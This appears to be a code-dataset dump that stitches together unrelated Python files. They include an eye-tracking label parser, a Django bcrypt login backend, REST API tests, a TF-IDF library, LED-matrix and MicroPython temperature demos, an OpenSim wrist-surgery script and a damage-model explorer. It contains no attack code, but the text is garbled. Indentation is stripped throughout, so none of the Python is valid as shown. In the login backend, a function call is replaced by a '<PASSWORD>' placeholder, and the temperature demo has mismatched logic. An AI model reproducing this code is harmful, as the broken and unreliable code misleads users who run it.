tempRecord = CTimeIntervalStamp('','','','') #store crossing time
#the first line, save the start date
Type = buffer[i][0]
if(Type == 'blink' or Type == 'lookLeft' or Type == 'lookRight'):
tempRecord.type = 'cali'
if(buffer[i][0] == 'blink'):
tempRecord.name = 'blink'
elif(buffer[i][0] == 'lookLeft'):
tempRecord.name = 'lookLeft'
elif(buffer[i][0] == 'lookRight'):
tempRecord.name = 'lookRight'
time = self.parseTimeString(buffer[i][1] + ' ' + buffer[i][2]).time() #read as datetime and change to time
tempRecord.startTime = time
tempRecord.endTime = time
tempRecord.type = 'cali'
self.timestamps.append(tempRecord)
self.rawdata.append(self.description + '_' + Type)
i += 1
else:
print("BlinksCaliLabels, readFile error")
return
def parseTimeString(self,string):
dateTime = outLib._OutsideLibTime()._importDatetime()
return dateTime.datetime.strptime(string , '%Y-%m-%d %H:%M:%S.%f')
class CAuditoryLabels(CLabels):
def readFile(self,fileName):
'''
read all the necessary information from the label files
'''
#include the OutsideLib module for Input/Output
self.outLibIO = outLib._OutsideLibIO()
self.description = 'Auditory'
self.type = "Auditory"
buffer = []
datetime = outLib._OutsideLibTime()._importDatetime()
with open(fileName, 'r') as the_file: #opoen the labels file
lines = the_file.readlines()
for line in lines: # read the label file
temp = line.split()
buffer.append(temp)
# print(len(buffer))
i = 0
while( i < len(buffer)): #buffer is the whole document
# print("i="+str(i))
# print(buffer[i][0])
#the first line, save the start date
if(i == 0):
[a,b,c,d,e,f] = [int(j) for j in buffer[i] if (j != '-' and j != ':') ]
self.startTime = datetime.datetime(a,b,c,d,e,f) # Lib: datetime
i+=1
#the left/right label
if(buffer[i][0]=='left' or buffer[i][0]=='right' or buffer[i][0] == 'Single'):
leftflag = ''
singleflag = False
if(buffer[i][0] == 'left'):
leftflag = True
elif(buffer[i][0] == 'Single'):
singleflag = True
else:
leftflag = False
tempRecord = CTimeIntervalStamp('','','','')
tempStimuli = CAuditoryStimulus()
i += 1
audioStart = buffer[i]
#the audio Start Label
if(audioStart[0] == 'audioStart'):
# real audio name
temp = audioStart[1]
realName, extension = os.path.splitext(temp)
if(singleflag == False):
# stimuli name
stimuliName = self.stimuliname(leftflag, realName)
tempStimuli.name = stimuliName
#print(stimuliName)
otherstimulisName = self.stimuliname(not leftflag, realName)# other stimuli name
tempStimuli.otherNames.append(otherstimulisName)
#print(otherstimulisName)
else:
tempStimuli.name = realName
tempStimuli.otherNames.append(realName)
# calculate start time
temp = audioStart[2:len(audioStart)]
[h,m,s,ms] = [int(t) for t in temp]
startTime = datetime.datetime(self.startTime.year,self.startTime.month,self.startTime.day,h,m,s,ms)
tempRecord.startTime = startTime
i+=1
#the audio End Label
audioEnd = buffer[i]
if(audioEnd[0] == 'audioEnd'):
tempRecord.index = audioEnd[1]
temp = audioEnd[2:len(audioEnd)]
[h,m,s,ms] = [int(t) for t in temp]
endTime = datetime.datetime(self.startTime.year,self.startTime.month,self.startTime.day,h,m,s,ms)
tempRecord.endTime = endTime
tempRecord.type = 'auditory'
self.append(tempRecord,tempStimuli)
i+=1
elif(buffer[i][0]=='-1'):
break
else:
raise TypeError("labels, loadfile error", buffer[i][0])
self.writeType("auditory")
return buffer
def stimuliname(self,isLeft, realName):
idx = realName.find('R')
if(isLeft == True):
realStimuli = realName[1:idx] # don't include the 'L'
else:
realStimuli = realName[idx+1:len(realName)] # don't include the 'R'
return realStimuli
def loadStimuli(self,Folder, extension, oCache : CStimuliCache = None):
'''
load stimuli in self.timestamps(CTimeIntervalStamp).stimuli
'''
if(extension == '.wav'):
for i in range(len(self.timestamps)):
label = self.rawdata[i]
mainStreamName = label.name
otherStreamNames = label.otherNames
print("AuditoryLabels, readStimuli:", mainStreamName,otherStreamNames[0])
mainStreamFullPath = Folder + mainStreamName + extension
otherStreamFullPaths = [Folder + i + extension for i in otherStreamNames]
self.rawdata[i].loadStimulus(mainStreamFullPath,otherStreamFullPaths)
# save this auditoryStimuli object to the data attribute of this markerRecord object
elif(extension == 'cache'):
for i in range(len(self.timestamps)):
label = self.rawdata[i]
mainStreamName = label.name
otherStreamNames = label.otherNames
print("AuditoryLabels, read Stimuli from cache:", mainStreamName,otherStreamNames[0])
self.rawdata[i].loadStimulus(mainStreamName,otherStreamNames,oCache)
# save this auditoryStimuli object to the data attribute of this markerRecord object
| StarcoderdataPython |
1745436 | <filename>coffeestats/caffeine/authbackend.py
"""
Custom authentication backend for coffeestats.
"""
from passlib.hash import bcrypt
import logging
from django.utils import timezone
from django.contrib.auth.hashers import make_password
from .models import User
logger = logging.getLogger(__name__)
class LegacyCoffeestatsAuth(object):
"""
Authentication backend for passwords generated by the original coffeestats
PHP implementation.
"""
def authenticate(self, username=None, password=None):
try:
user = User.objects.get(username=username)
except User.DoesNotExist:
return None
if not user.password:
logger.info(
'trying to authenticate %s with no password and cryptsum=%s',
user.username, user.cryptsum)
if self._check_password(user.cryptsum, password):
user.password = <PASSWORD>(password)
user.cryptsum = ''
user.last_login = timezone.now()
user.save()
return user
return None
def _check_password(self, passwordhash, password):
return bcrypt.verify(password, passwordhash)
def get_user(self, user_id):
try:
return User.objects.get(pk=user_id)
except User.DoesNotExist:
return None
| StarcoderdataPython |
1959890 | <reponame>telefonicaid/fiware-cosmos-platform<filename>cosmos-cli/cosmos/compute/tests/test_protocol.py
# -*- coding: utf-8 -*-
#
# Copyright (c) 2013-2014 Telefónica Investigación y Desarrollo S.A.U.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import requests
import unittest
from mock import MagicMock, patch
from os import path
import cosmos.common.cosmos_requests as cosmos_requests
from cosmos.common.exceptions import ResponseError
from cosmos.common.tests.util import mock_response
from cosmos.compute.protocol import Protocol
class ProtocolTest(unittest.TestCase):
def setUp(self):
self.api_url = 'http://localhost/api/v1'
self.auth = ('key', 'secret')
def __create_proto(self):
return Protocol(self.api_url, self.auth)
def assert_called_once_with(self, mock, *args, **keywords):
newkeywords = keywords.copy()
newkeywords.update({
'auth': self.auth,
'verify': path.join(
path.dirname(path.realpath(cosmos_requests.__file__)),
'cacerts.pem')})
mock.assert_called_once_with(*args, **newkeywords)
@patch('requests.get')
def test_list_clusters(self, getMock):
getMock.return_value = mock_response(status_code=200, json={
'clusters': [
{ 'id': '1', 'name': 'cluster1', 'state': 'ready' },
{ 'id': '2', 'name': 'cluster2', 'state': 'terminated' }
]
})
rep = self.__create_proto().get_clusters()
clusters = rep['clusters']
self.assert_called_once_with(getMock, self.api_url + '/cluster')
self.assertEquals(len(clusters), 2)
self.assertEquals(clusters[0]['id'], '1')
self.assertEquals(clusters[0]['name'], 'cluster1')
self.assertEquals(clusters[0]['state'], 'ready')
self.assertEquals(clusters[1]['id'], '2')
self.assertEquals(clusters[1]['name'], 'cluster2')
self.assertEquals(clusters[1]['state'], 'terminated')
@patch('requests.get')
def test_list_clusters_fail(self, getMock):
getMock.return_value = mock_response(status_code=500, json={
'error': 'request failed due to server error'
})
with self.assertRaises(ResponseError):
self.__create_proto().get_clusters()
@patch('requests.get')
def test_get_cluster_details(self, getMock):
getMock.return_value = mock_response(status_code=200, json={
'id': '1',
'name': 'cluster1',
'state': 'ready'
})
rep = self.__create_proto().get_cluster_details('1')
self.assert_called_once_with(getMock, self.api_url + '/cluster/1')
self.assertEquals(rep['id'], '1')
self.assertEquals(rep['name'], 'cluster1')
self.assertEquals(rep['state'], 'ready')
@patch('requests.get')
def test_get_cluster_details_fail(self, getMock):
getMock.return_value = mock_response(status_code=500, json={
'error': 'request failed due to server error'
})
with self.assertRaises(ResponseError):
self.__create_proto().get_cluster_details('1')
@patch('requests.post')
def test_create_cluster(self, postMock):
postMock.return_value = mock_response(status_code=201, json={
'id': '1',
'name': 'cluster1',
'state': 'ready',
'shared': False
})
rep = self.__create_proto().create_cluster('cluster1', 2, ['FOO'], False)
expected_body = json.dumps({ 'name' : 'cluster1', 'size' : 2,
'optionalServices': ['FOO'], 'shared': False })
self.assert_called_once_with(postMock, self.api_url + '/cluster',
expected_body)
self.assertEquals(rep['id'], '1')
self.assertEquals(rep['name'], 'cluster1')
self.assertEquals(rep['state'], 'ready')
self.assertEquals(rep['shared'], False)
@patch('requests.post')
def test_create_cluster_fail(self, postMock):
postMock.return_value = mock_response(status_code=500, json={
'error': 'request failed due to server error'
})
with self.assertRaises(ResponseError):
self.__create_proto().create_cluster('cluster1', 2, ['FOO', 'BAR'], True)
@patch('requests.post')
def test_terminate_cluster(self, postMock):
postMock.return_value = mock_response(status_code=200, json={
'message': 'termination accepted'
})
rep = self.__create_proto().terminate_cluster('1')
self.assert_called_once_with(postMock,
self.api_url + '/cluster/1/terminate')
self.assertEquals(rep['message'], 'termination accepted')
@patch('requests.post')
def test_terminate_cluster_fail(self, postMock):
postMock.return_value = mock_response(status_code=500, json={
'error': 'request failed due to server error'
})
with self.assertRaises(ResponseError):
self.__create_proto().terminate_cluster('1')
@patch('requests.get')
def test_list_services(self, getMock):
result = ['PIG', 'OOZIE']
getMock.return_value = mock_response(status_code=200,
json=result)
rep = self.__create_proto().list_services()
self.assert_called_once_with(getMock, self.api_url + '/services')
self.assertEquals(rep, result)
@patch('requests.get')
def test_list_services_fail(self, getMock):
getMock.return_value = mock_response(status_code=404)
rep = self.__create_proto().list_services()
self.assert_called_once_with(getMock, self.api_url + '/services')
self.assertEquals(rep, [])
| StarcoderdataPython |
8155783 | #!/usr/bin/env python
#
# Copyright 2009 <NAME> (<EMAIL>)
# Reviewed by <NAME>.
#
# This is a simple Tf-idf library. The algorithm is described in
# http://en.wikipedia.org/wiki/Tf-idf
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# Tfidf is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details:
#
# http://www.gnu.org/licenses/lgpl.txt
__author__ = "<NAME>"
__email__ = "<EMAIL>"
import math
import re
from operator import itemgetter
class TfIdf:
"""Tf-idf class implementing http://en.wikipedia.org/wiki/Tf-idf.
The library constructs an IDF corpus and stopword list either from
documents specified by the client, or by reading from input files. It
computes IDF for a specified term based on the corpus, or generates
keywords ordered by tf-idf for a specified document.
"""
def __init__(self, corpus_filename=None, stopword_filename=None,
DEFAULT_IDF=1.5):
"""Initialize the idf dictionary.
If a corpus file is supplied, reads the idf dictionary from it, in the
format of:
# of total documents
term: # of documents containing the term
If a stopword file is specified, reads the stopword list from it, in
the format of one stopword per line.
The DEFAULT_IDF value is returned when a query term is not found in the
idf corpus.
"""
self.num_docs = 0
self.term_num_docs = {} # term : num_docs_containing_term
self.stopwords = []
self.idf_default = DEFAULT_IDF
if corpus_filename:
corpus_file = open(corpus_filename, "r")
# Load number of documents.
line = corpus_file.readline()
self.num_docs = int(line.strip())
# Reads "term:frequency" from each subsequent line in the file.
for line in corpus_file:
tokens = line.split(":")
term = tokens[0].strip()
frequency = int(tokens[1].strip())
self.term_num_docs[term] = frequency
if stopword_filename:
stopword_file = open(stopword_filename, "r")
self.stopwords = [line.strip() for line in stopword_file]
def get_tokens(self, str):
"""Break a string into tokens, preserving URL tags as an entire token.
This implementation does not preserve case.
Clients may wish to override this behavior with their own tokenization.
"""
return re.findall(r"<a.*?/a>|<[^\>]*>|[\w'@#]+", str.lower())
def add_input_document(self, input):
"""Add terms in the specified document to the idf dictionary."""
self.num_docs += 1
words = set(self.get_tokens(input))
for word in words:
if word in self.term_num_docs:
self.term_num_docs[word] += 1
else:
self.term_num_docs[word] = 1
print(words)
def save_corpus_to_file(self, idf_filename, stopword_filename,
STOPWORD_PERCENTAGE_THRESHOLD=0.01):
"""Save the idf dictionary and stopword list to the specified file."""
output_file = open(idf_filename, "w")
output_file.write(str(self.num_docs) + "\n")
for term, num_docs in self.term_num_docs.items():
output_file.write(term + ": " + str(num_docs) + "\n")
sorted_terms = sorted(self.term_num_docs.items(), key=itemgetter(1),
reverse=True)
stopword_file = open(stopword_filename, "w")
for term, num_docs in sorted_terms:
if num_docs < STOPWORD_PERCENTAGE_THRESHOLD * self.num_docs:
break
stopword_file.write(term + "\n")
def get_num_docs(self):
"""Return the total number of documents in the IDF corpus."""
return self.num_docs
def get_idf(self, term):
"""Retrieve the IDF for the specified term.
This is computed by taking the logarithm of (
(number of documents in corpus) divided by (number of documents
containing this term) ).
"""
if term in self.stopwords:
return 0
if not term in self.term_num_docs:
return self.idf_default
result = math.log(float(1 + self.get_num_docs()) / (1 + self.term_num_docs[term]))
return result
def get_doc_keywords(self, curr_doc):
"""Retrieve terms and corresponding tf-idf for the specified document.
The returned terms are ordered by decreasing tf-idf.
"""
tfidf = {}
tokens = self.get_tokens(curr_doc)
tokens_set = set(tokens)
for word in tokens_set:
mytf = float(tokens.count(word)) / len(tokens_set)
myidf = self.get_idf(word)
tfidf[word] = mytf * myidf
return sorted(tfidf.items(), key=itemgetter(1), reverse=True)
document_query = "China has a strong economy that is growing at a rapid pace. However politically it differs greatly from the US Economy."
document_tokens1 = "China has a strong economy that is growing at a rapid pace. However politically it differs greatly from the US Economy."
document_tokens2 = "At last, China seems serious about confronting an endemic problem: domestic violence and corruption."
document_tokens3 = "Japan's prime minister, Shinzo Abe, is working towards healing the economic turmoil in his own country for his view on the future of his people."
document_tokens4 = "<NAME>in is working hard to fix the economy in Russia as the Ruble has tumbled."
document_tokens5 = "What's the future of Abenomics? We asked <NAME> for his views"
document_tokens6 = "Obama has eased sanctions on Cuba while accelerating those against the Russian Economy, even as the Ruble's value falls almost daily."
document_tokens7 = "<NAME> is riding a horse while hunting deer. <NAME> always seems so serious about things - even riding horses. Is he crazy?"
documents = [(0, document_tokens1), (1, document_tokens2), (2, document_tokens3), (3, document_tokens4),
(4, document_tokens5), (5, document_tokens6), (6, document_tokens7)]
tfidf = TfIdf()
tfidf.add_input_document(document_query)
print(tfidf.get_doc_keywords(document_tokens1))
| StarcoderdataPython |
5167295 | from rpi_ws281x import PixelStrip, WS2811_STRIP_RGB
# Matrix:
WIDTH = 13 + 25
HEIGHT = 8
# LED configuration.
LED_COUNT = WIDTH * HEIGHT # How many LEDs to light.
LED_DMA_NUM = 10 # DMA channel to use, can be 0-14.
LED_GPIO = 21 # GPIO connected to the LED signal line. Must support PWM!
class LEDs(PixelStrip):
def __init__(self):
# TODO: Check if GRB or RGB
super().__init__(LED_COUNT, LED_GPIO, dma=LED_DMA_NUM, strip_type=WS2811_STRIP_RGB)
self.begin()
def set_led(self, x: int, y=None, color=0x000000):
if y is None:
y = x // WIDTH
x = x % WIDTH
# Invert y as 0 is on the bottom
y = HEIGHT - y - 1
if y % 2 == 1:
x = WIDTH - x - 1
self.setPixelColor(x + WIDTH * y, color)
def get_led(self, x, y):
if y % 2 == 1:
x = WIDTH - x - 1
# Invert y as 0 is on the bottom
y = HEIGHT - y - 1
return self.getPixelColor(x + WIDTH * y)
| StarcoderdataPython |
391491 | <filename>Lib/site-packages/prompt_toolkit/output/conemu.py
import sys
assert sys.platform == "win32"
from typing import Any, Optional, TextIO
from prompt_toolkit.data_structures import Size
from .base import Output
from .color_depth import ColorDepth
from .vt100 import Vt100_Output
from .win32 import Win32Output
__all__ = [
"ConEmuOutput",
]
class ConEmuOutput:
"""
ConEmu (Windows) output abstraction.
ConEmu is a Windows console application, but it also supports ANSI escape
sequences. This output class is actually a proxy to both `Win32Output` and
`Vt100_Output`. It uses `Win32Output` for console sizing and scrolling, but
all cursor movements and scrolling happens through the `Vt100_Output`.
This way, we can have 256 colors in ConEmu and Cmder. Rendering will be
even a little faster as well.
http://conemu.github.io/
http://gooseberrycreative.com/cmder/
"""
def __init__(
self, stdout: TextIO, default_color_depth: Optional[ColorDepth] = None
) -> None:
self.win32_output = Win32Output(stdout, default_color_depth=default_color_depth)
self.vt100_output = Vt100_Output(
stdout, lambda: Size(0, 0), default_color_depth=default_color_depth
)
@property
def responds_to_cpr(self) -> bool:
return False # We don't need this on Windows.
def __getattr__(self, name: str) -> Any:
if name in (
"get_size",
"get_rows_below_cursor_position",
"enable_mouse_support",
"disable_mouse_support",
"scroll_buffer_to_prompt",
"get_win32_screen_buffer_info",
"enable_bracketed_paste",
"disable_bracketed_paste",
):
return getattr(self.win32_output, name)
else:
return getattr(self.vt100_output, name)
Output.register(ConEmuOutput)
| StarcoderdataPython |
12801185 | # demo of temperature-controlled neopixel ring
# 2017-0813 PePo - extracted from tutorial <NAME>!, youtube
# TMP36 instead of humidity
#
# Configuration:
# TMP36 is direct connected to ADC-port of Huzzah
# 8-neopixel stick is direct connected to pin 16 of Huzzah
# neopixelstick is powered from USB-port (which is 5V?!)
# TMP36 is powered from 3.3V (Huzzah)
from micropython import const
#import dht
import machine
import neopixel
import time
# h/w configuration
__NEOPIXEL_PIN = const(15)
__NUMBER_OF_PIXELS = const(8) #neopixel-stick
__TMP_PIN = const(0) # ADC ESP8266 must be 0
#__DHT_PIN = const(13)
__MAX_BRIGHTNESS = const(50)
np = neopixel.NeoPixel(machine.Pin(__NEOPIXEL_PIN, machine.Pin.OUT), __NUMBER_OF_PIXELS)
# test the pixels
np.fill((0,10,0))
np.write()
time.sleep(1.0)
# blank the pixels
np.fill((0,0,0))
np.write()
#TMP36 sensor
tmp = machine.ADC(__TMP_PIN)
def temp(value):
return (value - 500)/10.0
# read temperature, map it on scale to 40 i.e. enlarge the differences to see color differences
# 15 < t < 35: t - 15 -> scale 0 - 20
try:
while True:
temp_celsius = temp(tmp.read())
t = temp_celsius - 15.0 #scale down
print('T= {0:0.2f} C, t={1:0.2f}'.format(temp_celsius, t))
# convert humidity to color
red = (t/20.0) * __MAX_BRIGHTNESS
blue = ((20.0 - temp_celsius)/100.0) * __MAX_BRIGHTNESS
np.fill((int(red), 0, int(blue)))
np.write()
time.sleep(2.0)
except OSError:
pass
except:
print('done')
| StarcoderdataPython |
1856486 | from typing import Any
from fastapi import APIRouter
from app.schemas.msg import Msg
router = APIRouter()
@router.get(
"/hello-world",
response_model=Msg,
status_code=200,
include_in_schema=False,
)
def test_hello_world() -> Any:
return {"msg": "Hello world!"}
| StarcoderdataPython |
6614555 | <filename>Gui/opensim/Scripts/runTutorialTwo.py
# --------------------------------------------------------------------------- #
# OpenSim: runTutorialTwo.py #
# --------------------------------------------------------------------------- #
# OpenSim is a toolkit for musculoskeletal modeling and simulation, #
# developed as an open source project by a worldwide community. Development #
# and support is coordinated from Stanford University, with funding from the #
# U.S. NIH and DARPA. See http://opensim.stanford.edu and the README file #
# for more information including specific grant numbers. #
# #
# Copyright (c) 2005-2017 Stanford University and the Authors #
# Author(s): <NAME>, <NAME> #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); you may #
# not use this file except in compliance with the License. You may obtain a #
# copy of the License at http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
# --------------------------------------------------------------------------- #
# Written by <NAME>, Stanford University
## This example performs the steps of Tutorial Two in scripting form
import os.path
# Define the files and folders we will be using
resourceDir = getResourcesDir()
modelFolder = os.path.join(resourceDir, "Models", "WristModel")
modelName = os.path.join(modelFolder, "wrist.osim")
# Load the model
loadModel(modelName)
# Get a handle to the current model
oldModel = getCurrentModel()
# Create a fresh copy
myModel = modeling.Model(oldModel)
# Initialize the copy, if values needed to be set in state
# pass along the variable myState returned by initSystem
myState = myModel.initSystem()
# Change the name of the model
##myModel.setName("Wrist Tendon Surgery.")
## Change the path points of the ECU_pre-surgery to match the existing ECU_post-surgery muscle
ECU_PRE_pps = myModel.getMuscles().get("ECU_pre-surgery").getGeometryPath().updPathPointSet()
ECU_POST_pps= myModel.getMuscles().get("ECU_post-surgery").getGeometryPath().getPathPointSet()
# Clear all path points from the ECU_pre-surgery path point set
ECU_PRE_pps.clearAndDestroy()
# Add path points from the ECU_post-surgery path to the ECU_pre-surgery path
for i in range(ECU_POST_pps.getSize()):
ECU_PRE_pps.cloneAndAppend(ECU_POST_pps.get(i))
# re-initialize the model now that you changed the path points
myState = myModel.initSystem()
# Get full path name of myModel
fullPathName = myModel.getInputFileName()
# Change the name of the modified model
newName = fullPathName.replace('.osim', '_edited.osim')
myModel.print(newName)
# Load the model in the GUI
loadModel(newName)
## IV. Biomechanical Effects of Tendon Transfer
loadModel(fullPathName)
currentModel = getCurrentModel()
myState = currentModel.initSystem()
# Plot the RF and VASINT fiber lengths with the model in the default pose
plotterPanel = createPlotterPanel("Wrist Deviation Moment vs. Deviation Angle. ")
crv1 = addAnalysisCurve(plotterPanel, "moment.flexion", "ECRB+ECRL+ECU_pre-surgery+EDCI+EDCL+EDCM+EDCR+EDM+EIP+EPL","flexion")
setCurveLegend(crv1, "Before Transfer")
crv2 = addAnalysisCurve(plotterPanel, "moment.flexion", "ECRB+ECRL+ECU_post-surgery+EDCI+EDCL+EDCM+EDCR+EDM+EIP+EPL","flexion")
setCurveLegend(crv2, "After Transfer")
## Effect of Tendon transfer on ECU muscle
# Wrist Moment VS Flexion
plotterPanel = createPlotterPanel("Wrist Moment VS Flexion Angle")
crv1 = addAnalysisCurve(plotterPanel, "moment.flexion", "ECU_pre-surgery","flexion")
setCurveLegend(crv1, "Pre-Surgery")
crv2 = addAnalysisCurve(plotterPanel, "moment.flexion", "ECU_post-surgery","flexion")
setCurveLegend(crv2, "post-surgery")
# Tendon force VS Flexion
plotterPane2 = createPlotterPanel("Tendon force VS Flexion Angle")
crv1 = addAnalysisCurve(plotterPane2, "tendon force", "ECU_pre-surgery","flexion")
setCurveLegend(crv1, "Pre-Surgery")
crv2 = addAnalysisCurve(plotterPane2, "tendon force", "ECU_post-surgery","flexion")
setCurveLegend(crv2, "post-surgery")
# flexion moment arm VS Flexion
plotterPane3 = createPlotterPanel("flexion moment arm VS Flexion Angle")
crv1 = addAnalysisCurve(plotterPane3, "momentArm.flexion", "ECU_pre-surgery","flexion")
setCurveLegend(crv1, "Pre-Surgery")
crv2 = addAnalysisCurve(plotterPane3, "momentArm.flexion", "ECU_post-surgery","flexion")
setCurveLegend(crv2, "post-surgery")
# Create muscle objects for both a ECU pre- & post- surgery
ECUpresurgery = myModel.getMuscles().get("ECU_pre-surgery")
ECUpostsurgery = myModel.getMuscles().get("ECU_post-surgery")
# Find the optimal fibre length of that muscle
optLengthECUpre = ECUpresurgery.getOptimalFiberLength()
optLengthECUpost = ECUpostsurgery.getOptimalFiberLength()
## The Effect of Tendon Slack Length
myModel = getCurrentModel()
# Plot the muscle properties with existing Tendon-slack Length
# Tendon force VS Flexion
plotterPane1 = createPlotterPanel("Tendon force VS Flexion Angle")
crv1 = addAnalysisCurve(plotterPane1, "tendon force", "ECRB","flexion")
setCurveLegend(crv1, "ECRB")
# Muscle-tendon length VS Flexion
plotterPane2 = createPlotterPanel("Muscle-tendon length VS Flexion Angle")
crv2 = addAnalysisCurve(plotterPane2, "muscle-tendon length", "ECRB","flexion")
setCurveLegend(crv2, "ECRB")
# Fibre length VS Flexion
plotterPane3 = createPlotterPanel("Fibre length VS Flexion Angle")
crv3 = addAnalysisCurve(plotterPane3, "fiber-length", "ECRB","flexion")
setCurveLegend(crv3, "ECRB")
# Changing the optimal fibre length
# Create the ECRB muscle object
ECRB = myModel.getMuscles().get("ECRB")
# Back up the original tendon slack length (just in case)
backupTendonSlackLength = ECRB.getTendonSlackLength()
# Prescribe a new Tendon slack length
ECRB.setTendonSlackLength(0.2105)
# Re-initialize the states
myModel.initSystem()
# Plot the muscle properties with new Tendon-slack Length
# Tendon force VS Flexion
crv4 = addAnalysisCurve(plotterPane1, "tendon force", "ECRB","flexion")
setCurveLegend(crv4, "ECRB_0.210")
# Muscle-tendon length VS Flexion
crv5 = addAnalysisCurve(plotterPane2, "muscle-tendon length", "ECRB","flexion")
setCurveLegend(crv5, "ECRB_0.210")
# Fibre length VS Flexion
crv6 = addAnalysisCurve(plotterPane3, "fiber-length", "ECRB","flexion")
setCurveLegend(crv6, "ECRB_0.210")
| StarcoderdataPython |
344784 |
from .tableentrysort import sort_table_entries
from .common import assert_prettifier_works
def test_table_sorting():
toml_text = """description = ""
firstname = "adnan"
lastname = "fatayerji"
git_aydo = ""
groups = ["sales", "dubai", "mgmt"]
skype = ""
emails = ["<EMAIL>",
"<EMAIL>",
"<EMAIL>",
"<EMAIL>",
"<EMAIL>",
"<EMAIL>"]
# I really like this table
id = "fatayera"
git_github = ""
telegram = "971507192009"
mobiles = ["971507192009"]
"""
prettified = """description = ""
emails = ["<EMAIL>",
"<EMAIL>",
"<EMAIL>",
"<EMAIL>",
"<EMAIL>",
"<EMAIL>"]
firstname = "adnan"
git_aydo = ""
git_github = ""
groups = ["sales", "dubai", "mgmt"]
# I really like this table
id = "fatayera"
lastname = "fatayerji"
mobiles = ["971507192009"]
skype = ""
telegram = "971507192009"
"""
assert_prettifier_works(toml_text, prettified, sort_table_entries)
| StarcoderdataPython |
12850319 | <filename>tour5_damage_bond/damage2d_explorer.py
import numpy as np
import sympy as sp
import bmcs_utils.api as bu
from bmcs_cross_section.pullout import MATS1D5BondSlipD
s_x, s_y = sp.symbols('s_x, s_y')
kappa_ = sp.sqrt( s_x**2 + s_y**2 )
get_kappa = sp.lambdify( (s_x, s_y), kappa_, 'numpy' )
def get_tau_s(s_x_n1, s_y_n1, Eps_n, bs, **kw):
'''Get the stress for the slip in x, y dirctions given the state kappa_n'''
_, _, kappa_n = Eps_n
kappa = get_kappa(s_x_n1, s_y_n1)
# adapt the shape of the state array
kappa_n_ = np.broadcast_to(kappa_n, kappa.shape)
kappa_n1 = np.max(np.array([kappa_n_, kappa], dtype=np.float_),axis=0)
E_b = bs.E_b
omega_n1 = bs.omega_fn_(kappa_n1)
tau_x_n1 = (1 - omega_n1) * E_b * s_x_n1
tau_y_n1 = (1 - omega_n1) * E_b * s_y_n1
return (
np.array([s_x_n1, s_y_n1, kappa_n1]),
np.array([tau_x_n1, tau_y_n1, omega_n1])
)
def plot_tau_s(ax, Eps_n, s_min, s_max, n_s, bs, **kw):
n_s_i = complex(0,n_s)
s_x_n1, s_y_n1 = np.mgrid[s_min:s_max:n_s_i, s_min:s_max:n_s_i]
Eps_n1, Sig_n1 = get_tau_s(s_x_n1, s_y_n1, Eps_n, bs, **kw)
s_x_n1, s_y_n1, _ = Eps_n1
tau_x_n1, tau_y_n1, _ = Sig_n1
tau_n1 = np.sqrt(tau_x_n1**2 + tau_y_n1**2)
ax.plot_surface(s_x_n1, s_y_n1, tau_n1, alpha=0.2)
phi=np.linspace(0,2*np.pi,100)
_, _, kappa_n = Eps_n
kappa_0 = bs.omega_fn_.kappa_0
E_b = bs.E_b
r = max(kappa_0, kappa_n)
omega_n = bs.omega_fn_(r)
f_t = (1-omega_n)*E_b*r
s0_x, s0_y = r*np.sin(phi), r*np.cos(phi)
ax.plot(s0_x, s0_y, 0, color='gray')
ax.plot(s0_x, s0_y, f_t, color='gray')
ax.set_xlabel(r'$s_x$ [mm]');ax.set_ylabel(r'$s_y$ [mm]');
ax.set_zlabel(r'$\| \tau \| = \sqrt{\tau_x^2 + \tau_y^2}$ [MPa]');
class Explore(bu.Model):
name = 'Damage model explorer'
bs = bu.Instance(MATS1D5BondSlipD, ())
tree = ['bs']
def __init__(self, *args, **kw):
super(Explore, self).__init__(*args, **kw)
self.reset_i()
def reset_i(self):
self.s_x_0, self.s_y_0 = 0, 0
self.t0 = 0
self.Sig_record = []
self.Eps_record = []
iter_record = []
self.t_arr = []
self.s_x_t, self.s_y_t = [], []
self.Eps_n1 = np.zeros((3,), dtype=np.float_)
def get_response_i(self):
n_steps = self.n_steps
t1 = self.t0 + n_steps + 1
ti_arr = np.linspace(self.t0, t1, n_steps + 1)
si_x_t = np.linspace(self.s_x_0, self.s_x_1, n_steps + 1)
si_y_t = np.linspace(self.s_y_0, self.s_y_1, n_steps + 1)
for s_x_n1, s_y_n1 in zip(si_x_t, si_y_t):
self.Eps_n1, self.Sig_n1 = get_tau_s(s_x_n1, s_y_n1, self.Eps_n1, self.bs)
self.Sig_record.append(self.Sig_n1)
self.Eps_record.append(self.Eps_n1)
self.t_arr = np.hstack([self.t_arr, ti_arr])
self.s_x_t = np.hstack([self.s_x_t, si_x_t])
self.s_y_t = np.hstack([self.s_y_t, si_y_t])
self.t0 = t1
self.s_x_0, self.s_y_0 = self.s_x_1, self.s_y_1
return
def plot_Sig_Eps(self, ax1, Sig_arr):
tau_x, tau_y, kappa = Sig_arr.T
tau = np.sqrt(tau_x ** 2 + tau_y ** 2)
ax1.plot3D(self.s_x_t, self.s_y_t, tau, color='orange', lw=3)
def subplots(self, fig):
ax_sxy = fig.add_subplot(1, 1, 1, projection='3d')
return ax_sxy
def update_plot(self, ax):
self.get_response_i()
Sig_arr = np.array(self.Sig_record, dtype=np.float_)
Eps_arr = np.array(self.Eps_record, dtype=np.float_)
plot_tau_s(ax, Eps_arr[-1, ...],
self.s_min, self.s_max, 500, self.bs)
self.plot_Sig_Eps(ax, Sig_arr)
ax.plot(self.s_x_t, self.s_y_t, 0, color='red')
n_s = bu.Int(500, BC=True)
s_x_1 = bu.Float(0, BC=True)
s_y_1 = bu.Float(0, BC=True)
n_steps = bu.Float(20, BC=True)
s_min = bu.Float(-0.1, BC=True)
